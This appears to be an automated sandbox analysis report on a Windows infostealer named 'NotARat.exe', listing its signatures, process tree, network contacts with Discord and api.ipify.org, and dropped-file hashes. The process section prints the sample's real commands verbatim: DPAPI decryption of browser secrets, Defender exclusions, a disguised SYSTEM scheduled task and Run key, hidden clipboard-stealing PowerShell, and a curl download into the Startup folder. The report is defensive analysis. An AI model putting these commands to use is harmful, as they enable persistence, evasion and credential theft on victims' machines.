Malware Analysis Report

2025-03-15 00:54

Sample ID 240626-pxr6yavdnd
Target NotARat.exe
SHA256 2bef68392f825f8100b9b43ba618339786681a830f8e7729c60199b77a0c1d08
Tags
defense_evasion execution spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

2bef68392f825f8100b9b43ba618339786681a830f8e7729c60199b77a0c1d08

Threat Level: Likely malicious

The file NotARat.exe was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion execution spyware stealer

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Reads user/profile data of web browsers

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Hide Artifacts: Hidden Window

Looks up external IP address via web service

An obfuscated cmd.exe command-line is typically used to evade detection.

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

Detects videocard installed

Enumerates processes with tasklist

Modifies registry key

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-26 12:43

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-26 12:42

Reported

2024-06-26 12:43

Platform

win10v2004-20240611-en

Max time kernel

5s

Max time network

10s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NotARat.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\NotARat.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe N/A

Reads user/profile data of web browsers

spyware stealer

Hide Artifacts: Hidden Window

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3448 wrote to memory of 4648 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 3448 wrote to memory of 4648 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 4648 wrote to memory of 512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4648 wrote to memory of 512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4648 wrote to memory of 4684 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4648 wrote to memory of 4684 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4684 wrote to memory of 5000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4684 wrote to memory of 5000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 5000 wrote to memory of 624 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 5000 wrote to memory of 624 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3448 wrote to memory of 3596 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 3448 wrote to memory of 3596 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 3596 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3596 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3448 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 3448 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 948 wrote to memory of 3984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 948 wrote to memory of 3984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3448 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 3448 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 3448 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 3448 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2660 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3160 wrote to memory of 3988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3160 wrote to memory of 3988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3448 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 3448 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3468 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\NotARat.exe

"C:\Users\Admin\AppData\Local\Temp\NotARat.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fazsyl15\fazsyl15.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5F37.tmp" "c:\Users\Admin\AppData\Local\Temp\fazsyl15\CSCFCCCA6AD117F4F7FAA464D7591995D9E.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,214,81,225,118,57,32,187,77,148,157,112,156,147,7,151,106,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,42,82,230,175,100,47,24,121,244,38,217,77,134,94,156,21,93,118,76,169,73,67,148,94,19,158,84,26,52,226,35,237,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,223,57,68,165,139,175,21,194,10,220,128,158,89,208,99,19,222,138,51,26,163,91,19,34,194,203,13,123,9,0,3,186,48,0,0,0,198,120,45,52,168,82,21,129,226,214,224,149,134,250,60,27,74,221,39,187,147,205,244,73,156,1,1,218,54,18,45,155,159,228,180,137,208,250,82,200,165,92,102,164,194,214,225,77,64,0,0,0,145,14,212,182,95,66,45,242,222,249,66,252,109,108,103,126,252,50,253,152,3,149,161,109,106,148,207,64,23,253,167,70,41,48,47,233,236,254,214,245,208,198,38,75,161,42,134,37,154,108,19,207,58,239,164,34,36,132,34,175,159,77,3,21), $null, 'CurrentUser')"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,214,81,225,118,57,32,187,77,148,157,112,156,147,7,151,106,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,42,82,230,175,100,47,24,121,244,38,217,77,134,94,156,21,93,118,76,169,73,67,148,94,19,158,84,26,52,226,35,237,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,223,57,68,165,139,175,21,194,10,220,128,158,89,208,99,19,222,138,51,26,163,91,19,34,194,203,13,123,9,0,3,186,48,0,0,0,198,120,45,52,168,82,21,129,226,214,224,149,134,250,60,27,74,221,39,187,147,205,244,73,156,1,1,218,54,18,45,155,159,228,180,137,208,250,82,200,165,92,102,164,194,214,225,77,64,0,0,0,145,14,212,182,95,66,45,242,222,249,66,252,109,108,103,126,252,50,253,152,3,149,161,109,106,148,207,64,23,253,167,70,41,48,47,233,236,254,214,245,208,198,38,75,161,42,134,37,154,108,19,207,58,239,164,34,36,132,34,175,159,77,3,21), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,214,81,225,118,57,32,187,77,148,157,112,156,147,7,151,106,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,149,227,135,141,185,10,243,132,225,189,78,199,56,20,80,35,204,150,79,77,195,99,168,104,55,117,76,27,166,153,245,129,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,193,34,173,107,158,119,24,253,75,255,201,72,205,196,238,50,172,142,162,222,103,187,83,211,217,199,4,106,115,192,144,61,48,0,0,0,20,78,41,31,201,247,122,235,230,242,235,47,154,205,1,228,95,113,45,133,228,179,107,169,176,104,224,80,71,158,151,43,240,232,209,23,148,156,147,155,137,208,186,153,173,77,22,10,64,0,0,0,158,218,165,191,81,83,175,76,135,164,112,141,200,119,160,206,250,82,124,150,107,118,178,224,98,3,224,130,45,128,125,200,197,143,12,208,5,116,120,98,19,104,153,152,0,82,243,166,198,170,4,89,138,187,114,41,255,136,31,190,48,160,90,33), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,214,81,225,118,57,32,187,77,148,157,112,156,147,7,151,106,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,149,227,135,141,185,10,243,132,225,189,78,199,56,20,80,35,204,150,79,77,195,99,168,104,55,117,76,27,166,153,245,129,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,193,34,173,107,158,119,24,253,75,255,201,72,205,196,238,50,172,142,162,222,103,187,83,211,217,199,4,106,115,192,144,61,48,0,0,0,20,78,41,31,201,247,122,235,230,242,235,47,154,205,1,228,95,113,45,133,228,179,107,169,176,104,224,80,71,158,151,43,240,232,209,23,148,156,147,155,137,208,186,153,173,77,22,10,64,0,0,0,158,218,165,191,81,83,175,76,135,164,112,141,200,119,160,206,250,82,124,150,107,118,178,224,98,3,224,130,45,128,125,200,197,143,12,208,5,116,120,98,19,104,153,152,0,82,243,166,198,170,4,89,138,187,114,41,255,136,31,190,48,160,90,33), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get serialnumber

C:\Windows\system32\schtasks.exe

schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""

C:\Windows\system32\cscript.exe

cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bfefs0z2\bfefs0z2.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES68BC.tmp" "c:\Users\Admin\AppData\Local\Temp\bfefs0z2\CSC6AADD02211AD453DA425363CA9C4A4B6.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Description,PNPDeviceID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\System32\Wbem\WMIC.exe

wmic memorychip get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get processorid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"

C:\Windows\system32\getmac.exe

getmac /NH

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\NotARat.exe" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 discord.com udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
BE 88.221.83.203:443 www.bing.com tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 203.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
US 104.26.12.205:80 api.ipify.org tcp
N/A 224.0.0.251:5353 udp
US 104.26.12.205:80 api.ipify.org tcp

Files

C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

MD5 66a65322c9d362a23cf3d3f7735d5430
SHA1 ed59f3e4b0b16b759b866ef7293d26a1512b952e
SHA256 f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
SHA512 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

C:\Users\Admin\AppData\Local\Temp\temp.ps1

MD5 18047e197c6820559730d01035b2955a
SHA1 277179be54bba04c0863aebd496f53b129d47464
SHA256 348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3
SHA512 1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

memory/4684-72-0x00007FF9F7413000-0x00007FF9F7415000-memory.dmp

memory/4684-73-0x0000025E06EF0000-0x0000025E06F12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_psgny50s.boa.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4684-83-0x00007FF9F7410000-0x00007FF9F7ED1000-memory.dmp

memory/4684-84-0x00007FF9F7410000-0x00007FF9F7ED1000-memory.dmp

memory/4684-85-0x0000025E21690000-0x0000025E216D4000-memory.dmp

memory/4684-86-0x0000025E21AB0000-0x0000025E21B26000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\fazsyl15\fazsyl15.cmdline

MD5 40ee34a07d711f250ff9b3db33200775
SHA1 8d10361f431c5b0fa2dea43e50ace98200df4e56
SHA256 c077e18005105bb085d28bfd7af097b7006171f1106bcc0d0253b335f1b6c41d
SHA512 3328cb64bf0710f60594e86c67d8ed1dbb57da5f9c2e9bd3e6101c982941d581357c181a9e778d2a1b5c945870728a67da9540db793159cd937f2c2df337233e

\??\c:\Users\Admin\AppData\Local\Temp\fazsyl15\fazsyl15.0.cs

MD5 7bc8de6ac8041186ed68c07205656943
SHA1 673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75
SHA256 36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697
SHA512 0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

\??\c:\Users\Admin\AppData\Local\Temp\fazsyl15\CSCFCCCA6AD117F4F7FAA464D7591995D9E.TMP

MD5 4cb085e7d9c7d80b7e6a5b344dfc1f7a
SHA1 1e5c416734ea81f75608744caefe2f24a295db66
SHA256 41f2a7145c9d98c44e8a2c81d3b7cb4bbefa322bb04236b8b823fe81b06174bf
SHA512 a84309390fe72ba6e6019f082a162ef8fc01e33dc5ccc0cb7c3f20a9298c5578d15fb0dd4827354d780b410b2110f4dc888b4131f284d412c417ef745919a746

C:\Users\Admin\AppData\Local\Temp\RES5F37.tmp

MD5 bebc6a893895a28a4a7055b53cc0a771
SHA1 38cf7ab944ac1782d0b03f9764dab940caa1e840
SHA256 4cb7b6ec0f96dcf276e9cfeef0b56d8ba4afb319709f15fc6050b2a4b0c9b402
SHA512 6ec569b179e539d92aec8c1db49b356a304b9b589241e529eb28fdbe222261c79a802f915c07aaf1fd7309e97c02266a20892d7bde2521322b7da16ccf3c5e29

C:\Users\Admin\AppData\Local\Temp\fazsyl15\fazsyl15.dll

MD5 c2671dbb00382d83e362947523d39350
SHA1 e4cc7555fd54941d906f92758cab37a2c2a34a10
SHA256 b59abad7e01c08608fe4de16190f853069f8341835f84e15557a4636a301e383
SHA512 44b6ec9729278173a3717c2d628c7e69634b7e3159e79842b5426568f2f1f653d424054f4f5c658025a1b4683ec7a6eaa0fa7f665419ad40c3901f5ec9d72a32

memory/4684-99-0x0000025E06F50000-0x0000025E06F58000-memory.dmp

memory/4684-103-0x00007FF9F7410000-0x00007FF9F7ED1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 3f01549ee3e4c18244797530b588dad9
SHA1 3e87863fc06995fe4b741357c68931221d6cc0b9
SHA256 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
SHA512 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

memory/3988-115-0x000001C53F570000-0x000001C53F5C0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f79387492e5d2264cb94e2f480feaf78
SHA1 13f478f478bf824d8cccb611ac9b2645d5523c93
SHA256 f7d942ea9e79af246b7a4e461133ed9434f980e837a8b96f1e35f856ddead9e7
SHA512 c1a16d6c0edeba6659f08ae115b4ed5c496063d9e4339ff0869a85295798fb66281dba43b6de8118bda69db0d34a65966f84c522b9adcf94581934438c015479

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 390d7206a5094d20f7a129fabb9695d9
SHA1 4b45920bd622c5356a5b1b991cc4dc9e3b6cb7b0
SHA256 8daae1b798f946102fb352c485d4c86f2f8feb651cb7d9f330e9d0f488d40ed5
SHA512 dfebf2b6b94021f6bf4973c5d1d34324aea2aa0fa444a2a9024c3ba78e13630eb8fd201fb3b08eb512b89ef8b6e1d1161720c0618d0de10ebb5000c249e89384

C:\ProgramData\edge\Updater\RunBatHidden.vbs

MD5 14a9867ec0265ebf974e440fcd67d837
SHA1 ae0e43c2daf4c913f5db17f4d9197f34ab52e254
SHA256 cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1
SHA512 36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

C:\ProgramData\edge\Updater\Get-Clipboard.ps1

MD5 a8834c224450d76421d8e4a34b08691f
SHA1 73ed4011bc60ba616b7b81ff9c9cad82fb517c68
SHA256 817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5
